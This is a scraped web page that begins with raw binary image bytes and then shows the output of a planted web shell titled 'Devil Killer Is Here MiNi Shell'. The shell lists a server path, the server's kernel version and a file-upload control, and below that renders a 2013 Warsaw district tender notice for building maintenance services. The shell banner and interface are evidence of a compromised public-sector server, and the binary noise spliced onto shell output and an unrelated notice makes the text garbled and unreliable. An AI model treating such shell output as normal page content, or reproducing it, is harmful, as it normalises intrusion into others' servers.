JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131125/251611-N-2013.html

<p class="kh_header"><b>Warszawa: konserwacja instalacji i urządzeń elektrycznych w obiektach Urzędu Dzielnicy Praga - Południe w Warszawie; konserwacja urządzeń dźwigowych w budynku Urzędu Dzielnicy Praga - Południe w Warszawie; konserwacja instalacji i utrzymanie w ruchu central telefonicznych, sieci telefonicznej i logicznej w obiektach Urzędu Dzielnicy Praga - Południe w Warszawie; konserwacja systemów bezpieczeństwa w obiektach Urzędu Dzielnicy Praga - Południe w Warszawie.</b><br>
<b>Numer ogłoszenia: 251611 - 2013; data zamieszczenia: 25.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd m. st. Warszawy dla Dzielnicy Praga Południe , ul. Grochowska 274, 03-841 Warszawa, woj. mazowieckie, tel. 22 33 80 717, faks 22 33 80 767.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pragapld.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> konserwacja instalacji i urządzeń elektrycznych w obiektach Urzędu Dzielnicy Praga - Południe w Warszawie; konserwacja urządzeń dźwigowych w budynku Urzędu Dzielnicy Praga - Południe w Warszawie; konserwacja instalacji i utrzymanie w ruchu central telefonicznych, sieci telefonicznej i logicznej w obiektach Urzędu Dzielnicy Praga - Południe w Warszawie; konserwacja systemów bezpieczeństwa w obiektach Urzędu Dzielnicy Praga - Południe w Warszawie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są konserwacje w obiektach Urzędu Dzielnicy Praga - Południe w Warszawie. Zakres konserwacji obejmuje:
Część pierwsza - konserwacja instalacji i urządzeń elektrycznych w obiektach Urzędu Dzielnicy Praga - Południe w Warszawie,
Przedmiotem zamówienia jest konserwacja instalacji i urządzeń elektrycznych w obiektach Urzędu Dzielnicy Praga - Południe, a w szczególności:
1)	Napraw zgłoszonych przez Zamawiającego wymienionych w ust. 1 załącznika 2 do wzoru umowy i pozostawanie w gotowości do ich wykonania,
2)	wykonanie dwunastu miesięcznych przeglądów konserwacyjnych,
3)	wykonanie jednego rocznego przeglądu konserwacyjnego
Część druga - konserwacja urządzeń dźwigowych w budynku Urzędu Dzielnicy Praga - Południe w Warszawie,
Przedmiotem zamówienia jest konserwacja urządzeń dźwigowych w budynku Urzędu Dzielnicy Praga - Południe przy ul. Grochowskiej 274a w szczególności wykonanie:
1)	jedenastu bieżących przeglądów konserwacyjnych  dwóch dźwigów osobowych nr rej. 312706037 i 312706079 oraz platformy pochyłej przyschodowej dla osób niepełnosprawnych typ VIMEC V64 nr rej. 3027000427, zainstalowanych w budynku Urzędu m.st. Warszawy Urzędu Dzielnicy Praga -  Południe przy ul. Grochowskiej 274 w Warszawie,
2)	jednego, głównego przeglądu konserwacyjnego dwóch dźwigów osobowych nr rej. 312706037 i 312706079 oraz platformy pochyłej przyschodowej dla osób niepełnosprawnych typ VIMEC V64 nr rej. 3027000427, zainstalowanych w budynku Urzędu m. st. Warszawy Urzędu Dzielnicy Praga - Południe przy ul. Grochowskiej 274 w Warszawie, zakończonego wykonaniem badań urządzeń o nr rej. 312706037 i 312706079 przez Urząd Dozoru Technicznego.
Część trzecia - konserwacja instalacji i utrzymanie w ruchu central telefonicznych, sieci telefonicznej i logicznej w obiektach Urzędu Dzielnicy Praga - Południe w Warszawie, 
Przedmiotem zamówienia jest:
1)	konserwacja instalacji i utrzymanie w ruchu central telefonicznych, sieci telefonicznej i logicznej w obiektach Urzędu Dzielnicy Praga-Południe w okresie od dnia zawarcia umowy do 30.11.2014 r.
2)	usuwanie awarii central telefonicznych oraz sieci telefonicznej i logicznej
Część czwarta - konserwacja systemów bezpieczeństwa w obiektach Urzędu Dzielnicy Praga - Południe w Warszawie.
Przedmiotem zamówienia jest konserwacja systemów bezpieczeństwa w obiektach Urzędu Dzielnicy Praga - Południe  a w szczególności wykonanie:
1)	czterech przeglądów konserwacyjnych systemów:
a.	sygnalizacji włamania i napadu,
b.	telewizji dozorowej,
c.	informacji o pożarze,
d.	kontroli dostępu, zainstalowanych w budynku Urzędu Dzielnicy Praga - Południe przy ul. Grochowskiej 274 w Warszawie,
2)	dwóch przeglądów konserwacyjnych systemów:
a.	oddymiania klatek schodowych,
b.	sterowania drzwiami ewakuacyjnymi,
c.	 informacji o zarządzeniu ewakuacji budynku,
d.	drzwi przeciwpożarowych zainstalowanych w budynku Urzędu Dzielnicy Praga Południe przy ul. Grochowskiej 274 w Warszawie,
3)   	czterech przeglądów konserwacyjnych systemów:
a.	sygnalizacji o włamaniu i pożarze,
b.	kontroli dostępu, zainstalowanych w lokalu Urzędu Dzielnicy Praga Południe przy ul. Podskarbińskiej w Warszawie,
       4)      dwóch przeglądów konserwacyjnych systemów:
a.	oddymiania klatek schodowych,
b.	wykrywania gazu (GAZEX),
c.	drzwi przeciwpożarowych, zainstalowanych w lokalu Urzędu Dzielnicy Praga - Południe przy ul. Podskarbińskiej 6 w Warszawie,
5)	jednej kalibracji dwóch sztuk detektorów gazu  zainstalowanych w piwnicy lokalu Urzędu Dzielnicy Praga - Południe przy ul. Podskarbińskiej 6 w Warszawie,
6)	jednego czyszczenia komór czujek optycznych zlokalizowanych w systemach wymienionych w pkt. 1: lit. a i c, pkt 2 lit. a i b, pkt 3 lit.a oraz pkt 4 lit. a, oraz sprawdzenia poprawności ich działania poprzez kontrolne zadymienie..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych, stanowiących nie więcej niż 50% zamówienia podstawowego dla wszystkich części zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.71.00.00-5, 50.75.00.00-7, 50.33.41.00-6, 50.61.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>A.	dla części pierwszej - wykazania co najmniej 2 usług o wartości brutto po min. 
35 000 zł każda, polegających na konserwacji instalacji i urządzeń elektrycznych o charakterze podobnym do przedmiotu zamówienia (tzn. wykonanych w sposób ciągły w ramach 1 umowy), wykonanych/wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Za spełnienie warunku wykonania/wykonywania usług wykonania konserwacji instalacji i urządzeń elektrycznych w sposób ciągły Zamawiający uzna prace wykonywane nieprzerwanie w okresie min. 9 m-cy i max. 12 m-cy (załącznik nr 3 do SIWZ),
B.	dla części drugiej - wykazania co najmniej 2 usług o wartości brutto po min. 8 000 zł każda, polegających na konserwacji urządzeń dźwigowych w tym dźwigów osobowych o charakterze podobnym do przedmiotu zamówienia (tzn. wykonana w sposób ciągły w ramach 1 umowy), wykonanych/wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Za spełnienie warunku wykonania/wykonywania usług wykonania konserwacji urządzeń dźwigowych w sposób ciągły Zamawiający uzna prace wykonywane nieprzerwanie w okresie min. 9 m-cy i max. 12 m-cy (załącznik nr 3a do SIWZ),
C.	dla części trzeciej - wykazania co najmniej 2 usług o wartości brutto po min. 
15 000 zł  każda, polegających na konserwacji instalacji i utrzymania w ruchu central telefonicznych AVAYA oraz sieci telefonicznej i logicznej, o charakterze podobnym do przedmiotu zamówienia (tzn. wykonana w sposób ciągły w ramach 1 umowy), wykonanych/wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Za spełnienie warunku wykonania/wykonywania usług wykonania konserwacji instalacji i utrzymania w ruchu central telefonicznych oraz sieci telefonicznej i logicznej, w sposób ciągły Zamawiający uzna prace wykonywane nieprzerwanie w okresie min. 9 m-cy i max. 12 m-cy (załącznik nr 3b do SIWZ),
D.	dla części czwartej - wykazania co najmniej 2 usług o wartości brutto po min. 
15 000 zł każda, polegających na konserwacji systemów bezpieczeństwa o charakterze podobnym do przedmiotu zamówienia (tzn. wykonana w sposób ciągły w ramach 1 umowy), wykonanych/wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Za spełnienie warunku wykonania/wykonywania usług wykonania konserwacji systemów bezpieczeństwa, w sposób ciągły Zamawiający uzna prace wykonywane nieprzerwanie w okresie min. 9 m-cy i max. 12 m-cy (załącznik nr 3c do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga:
a).dysponowania osobami, które będą uczestniczyć w wykonywaniu zamówienia, w tym co najmniej:
1.dla części pierwszej - przynajmniej dwoma osobami, w tym jedną osobą posiadającą świadectwo kwalifikacyjne typu E oraz jedną osobą posiadającą świadectwo kwalifikacyjne typu D uprawniające do zajmowania się eksploatacją urządzeń i instalacji i sieci elektroenergetycznych do 1 kV - wydane przez Stowarzyszenie Elektryków Polskich lub inną Komisję Kwalifikacyjną o równorzędnych uprawnieniach, zezwalające na pracę przy urządzeniach i  instalacjach elektroenergetycznych;
2.dla części drugiej - przynajmniej dwoma osobami (prace konserwacyjne powinny być wykonywane co najmniej przez dwie osoby). posiadającymi odpowiednie zaświadczenia uprawniające do wykonywania konserwacji dźwigów oraz posiadające świadectwa kwalifikacyjne, uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci elektroenergetycznych do 1 kV, na stanowisku eksploatacji i dozoru - wydane przez Stowarzyszenie Elektryków Polskich lub inną Komisję Kwalifikacyjną o równorzędnych uprawnieniach, zezwalające na pracę przy urządzeniach i  instalacjach elektroenergetycznych;
3.dla części trzeciej - przynajmniej dwoma osobami, wykonujących konserwację z których przynajmniej jedna osoba powinna posiadać następujące kwalifikacje i uprawnienia:
A.	uprawnienia elektryczne na stanowisku eksploatacji - wydane przez Stowarzyszenie Elektryków Polskich lub inną Komisję Kwalifikacyjną o równorzędnych uprawnieniach, zezwalające na pracę przy urządzeniach i  instalacjach elektroenergetycznych, 
B.	doświadczenie w wykonywaniu prac konserwacyjnych central telefonicznych (dla centrali telefonicznej Avaya Communication Manager w oparciu o serwer S8500 z wersją oprogramowania CM4 oraz modułami Media Gateway G650 w konfiguracji IPConnect),  instalacji teletechnicznych (potwierdzone referencjami), analogowych bramek GSM (SIMADO 4 GATE) zintegrowanych  z centralą telefoniczną.
C.	doświadczenie w wykonywaniu instalacji teletechnicznych (telefonicznych) i komputerowych,
D.	niezbędną wiedzę i umiejętności w zakresie obsługi: systemu centrali telefonicznej AVAYA DEFINITY w oparciu o serwer S8500 z wersją oprogramowania CM4 oraz modułami Media Gateway G650 w konfiguracji IPConnect; modułu wyniesionego PN systemu telekomunikacyjnego wykonanego w oparciu o AMG G700, wyposażonego w kartę MM 711;  aparatów systemowych oraz IP (potwierdzone stosownym świadectwem lub certyfikatem ze szkolenia),
4.dla części czwartej - przynajmniej dwoma osobami, z których przynajmniej jedna będzie posiadała uprawnienia do wykonywania przeglądów konserwacyjnych i będzie posiadała świadectwo kwalifikacyjne uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci elektroenergetycznych do 1 kV, na stanowisku eksploatacji i dozoru - wydane przez Stowarzyszenie Elektryków Polskich lub inną Komisję Kwalifikacyjną o równorzędnych uprawnieniach, zezwalające na pracę przy urządzeniach i  instalacjach elektroenergetycznych. Uwaga: Wykonawca musi posiadać autoryzację producenta central oddymiania D+H. 
b).złożenia oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymagaubezpieczenia Wykonawcy od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości nie mniejszej niż:
- 30.000 zł  (słownie: trzydzieści tysięcy) - przy składaniu oferty na 1 część,
- 60.000 zł (słownie: sześćdziesiąt tysięcy) - przy składaniu oferty na 2 części,
- 90 000 zł (słownie: dziewięćdziesiąt tysięcy) - przy składaniu oferty na 3 części,
- 140.000 zł  (słownie: sto czterdzieści tysięcy) - przy składaniu oferty na 4 części</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony Formularz Oferty - wg wzoru stanowiącego załącznik Nr 1 do SIWZ, 2. oświadczenia o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp (załącznik nr 2 do SIWZ), 3. W przypadku, gdy Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, polega na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków - pisemnego zobowiązania tych podmiotów lub innego dokumentu potwierdzającego oddanie Wykonawcy do dyspozycji niezbędnych rzeczywistych zasobów na okres korzystania z nich przy wykonywaniu zamówienia na zasadach określonych w § 1 ust. 6 pkt 2) rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów jakich może żądać Zamawiający od Wykonawcy oraz form w jakich te dokumenty mogą być składane, co następuje: - zakresu dostępnych wykonawcy zasobów innego podmiotu, - sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia, - charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem, - zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany postanowień zawartej umowy w stosunku do wzoru umowy stanowiącego załącznik Nr 6 do SIWZ w zakresie gdy:
1) nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,
2) nastąpi zmiana nazwy i siedziby; NIP - u, Regonu Wykonawcy, jeżeli nie powoduje  to zmiany Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zamowienia.pragapld.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Wydziału Zamówień Publicznych w Warszawie przy ul. Podskarbińskiej 6 w sali nr 203 na II..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2013 godzina 12:00, miejsce: W siedzibie Wydziału Zamówień Publicznych w Warszawie przy ul. Podskarbińskiej 6 w sali nr 203 na II..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> konserwacja instalacji i urządzeń elektrycznych w obiektach Urzędu Dzielnicy Praga - Południe w Warszawie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest konserwacja instalacji i urządzeń elektrycznych w obiektach Urzędu Dzielnicy Praga - Południe, a w szczególności:
1)	Napraw zgłoszonych przez Zamawiającego wymienionych w ust. 1 załącznika 2 do wzoru umowy i pozostawanie w gotowości do ich wykonania,
2)	wykonanie dwunastu miesięcznych przeglądów konserwacyjnych,
3)	wykonanie jednego rocznego przeglądu konserwacyjnego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.71.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> konserwacja urządzeń dźwigowych w budynku Urzędu Dzielnicy Praga - Południe w Warszawie.</p>
